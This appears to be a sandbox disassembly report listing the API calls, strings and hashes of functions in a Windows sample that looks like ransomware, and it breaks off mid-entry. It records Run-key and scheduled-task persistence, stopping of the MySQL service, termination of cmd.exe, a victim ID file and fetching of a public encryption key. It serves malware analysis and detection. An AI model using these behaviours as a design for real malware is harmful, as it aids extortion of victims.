Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
_memset.LIBCMT ref: 004123B6
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
RegCloseKey.ADVAPI32(?), ref: 004123E7
GetCommandLineW.KERNEL32 ref: 004123F4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
lstrcmpW.KERNEL32(?,?), ref: 00412422

Strings

SysHelper, xrefs: 004123D6
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
API String ID: 122392481-4165002228
Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94

Uniqueness

Uniqueness Score: -1.00%

Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004180B9
_memmove.LIBCMT ref: 00418124
_memmove.LIBCMT ref: 004181A8
_memmove.LIBCMT ref: 00418221
_memmove.LIBCMT ref: 00418288
_memmove.LIBCMT ref: 004182C6
_memmove.LIBCMT ref: 00418305

Strings

invalid string position, xrefs: 00418342
string too long, xrefs: 00418338

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040DAEB
CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
_memset.LIBCMT ref: 0040DC38
CoUninitialize.OLE32 ref: 0040DC92

Strings

--Task, xrefs: 0040DBB5
Comment, xrefs: 0040DBFF
Time Trigger Task, xrefs: 0040DB24, 0040DB34, 0040DB52

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
String ID: --Task$Comment$Time Trigger Task
API String ID: 330603062-1376107329
Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
Sleep.KERNEL32(?), ref: 00411A75
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1

Strings

MYSQL, xrefs: 00411A2C

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
String ID: MYSQL
API String ID: 2359367111-1651825290
Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0044F27F

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F294

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

std::exception::exception.LIBCMT ref: 0044F2AD
__CxxThrowException@8.LIBCMT ref: 0044F2C2
std::regex_error::regex_error.LIBCPMT ref: 0044F2D4

Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E

__CxxThrowException@8.LIBCMT ref: 0044F2E2
std::exception::exception.LIBCMT ref: 0044F2FB
__CxxThrowException@8.LIBCMT ref: 0044F310

Strings

bad function call, xrefs: 0044F316

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
GetLastError.KERNEL32(?,?,00000000), ref: 00465503
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5

Strings

',', xrefs: 0046560B
.\crypto\bio\bss_file.c, xrefs: 004655F0, 0046562F, 00465640
fopen(', xrefs: 00465611

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID: ','$.\crypto\bio\bss_file.c$fopen('
API String ID: 1717984340-2085858615
Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB

Uniqueness

Uniqueness Score: -1.00%

Function 00425B6E Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00425BF8
__lock.LIBCMT ref: 00425C0E
__copytlocinfo_nolock.LIBCMT ref: 00425C1F
__wsetlocale_nolock.LIBCMT ref: 00425C36
__lock.LIBCMT ref: 00425C70
__updatetlocinfoEx_nolock.LIBCMT ref: 00425C82
___removelocaleref.LIBCMT ref: 00425C88
__updatetlocinfoEx_nolock.LIBCMT ref: 00425CA7

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
String ID:
API String ID: 790675137-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8

_fgetws.LIBCMT ref: 0040C7BC
_memmove.LIBCMT ref: 0040C89F
CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C77C, 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: CreateDirectory__wfsopen_fgetws_memmove
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2864494435-54166481
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
CloseHandle.KERNEL32(00000000), ref: 004124B7
Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
CloseHandle.KERNEL32(00000000), ref: 004124CD

Strings

cmd.exe, xrefs: 00412486

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: cmd.exe
API String ID: 2696918072-723907552
Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353

Strings

SHGetFolderPathW, xrefs: 0040F34D
\, xrefs: 0040F548
Shell32.dll, xrefs: 0040F32C

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetFolderPathW$Shell32.dll$\
API String ID: 2574300362-2555811374
Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 0040CDDE
_malloc.LIBCMT ref: 0040CE12
_malloc.LIBCMT ref: 0040CE21
_fprintf.LIBCMT ref: 0040CE75

Strings

 , xrefs: 0040CCAF
Error encrypting message: %s, xrefs: 0040CE67
\\n, xrefs: 0040CC1B

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:  $Error encrypting message: %s$\\n
API String ID: 1783060780-3771355929
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 00463382
_strncmp.LIBCMT ref: 004633C2

Strings

.\crypto\pem\pem_lib.c, xrefs: 00463393, 004633D3, 00463407, 00463439, 00463491
DEK-Info: , xrefs: 00463422
ENCRYPTED, xrefs: 004633BC
Proc-Type: , xrefs: 0046337C

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
API String ID: 909875538-2908105608
Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
RegCloseKey.ADVAPI32(00000000), ref: 0040C700
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
RegCloseKey.ADVAPI32(00000000), ref: 0040C72E

Strings

SysHelper, xrefs: 0040C6EB, 0040C71D
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040C6B8

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
API String ID: 3962714758-1667468722
Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041E707

Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B

InternetOpenW.WININET ref: 0041E743
_wcsstr.LIBCMT ref: 0041E7AE
_memmove.LIBCMT ref: 0041E838
lstrcpyW.KERNEL32(?,?), ref: 0041E90A
lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
InternetCloseHandle.WININET(00000000), ref: 0041E9F3
InternetCloseHandle.WININET(00000000), ref: 0041E9F6
_strstr.LIBCMT ref: 0041EA36
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
DeleteFileA.KERNEL32(?), ref: 0041EA82
lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
lstrcpyA.KERNEL32(?,?), ref: 0041EABA
lstrlenA.KERNEL32(?), ref: 0041EAC8
lstrlenA.KERNEL32(00000022), ref: 0041EAE3
lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
lstrlenA.KERNEL32(?), ref: 0041EB7C
_malloc.LIBCMT ref: 0041EB86
_memset.LIBCMT ref: 0041EB94
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
_strstr.LIBCMT ref: 0041EBDA
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
DeleteFileA.KERNEL32(?), ref: 0041EC32

Strings

{"public_key":", xrefs: 0041EA2E
bowsakkdestx.txt, xrefs: 0041EA67

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
String ID: bowsakkdestx.txt${"public_key":"
API String ID: 2805819797-1771568745
Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B

Uniqueness

Uniqueness Score: -1.00%

Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 004574E9

Strings

, xrefs: 00457482
+, xrefs: 00457475
UlE, xrefs: 00457596, 004575A9, 004575D1, 004575F6, 0045762A, 0045765D, 0045767F
0123456789abcdef, xrefs: 004574C4
0123456789ABCDEF, xrefs: 004574D6

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
API String ID: 1302938615-3129329331
Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96

Uniqueness

Uniqueness Score: -1.00%

Function 004306EC Relevance: 10.6, APIs: 7, Instructions: 84COMMON

Download Yara Rule

APIs

___unDName.LIBCMT ref: 0043071B
_strlen.LIBCMT ref: 0043072E
__lock.LIBCMT ref: 0043074A
_malloc.LIBCMT ref: 0043075C
_malloc.LIBCMT ref: 0043076D
_free.LIBCMT ref: 004307B6

Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF

_free.LIBCMT ref: 004307AF

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
String ID:
API String ID: 3704956918-0
Opcode ID: 491e64a43db57974c805febdf09b12bb5f9e435b923affe35b2a08799ec4d9db
Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
Opcode Fuzzy Hash: 491e64a43db57974c805febdf09b12bb5f9e435b923affe35b2a08799ec4d9db
Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98

Uniqueness

Uniqueness Score: -1.00%

Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00411B1E
timeGetTime.WINMM ref: 00411B29
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
DispatchMessageW.USER32(?), ref: 00411B5C
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
Sleep.KERNEL32(00000064), ref: 00411B72
timeGetTime.WINMM ref: 00411B78

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: MessageTimetime$Peek$DispatchSleep
String ID:
API String ID: 3697694649-0
Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
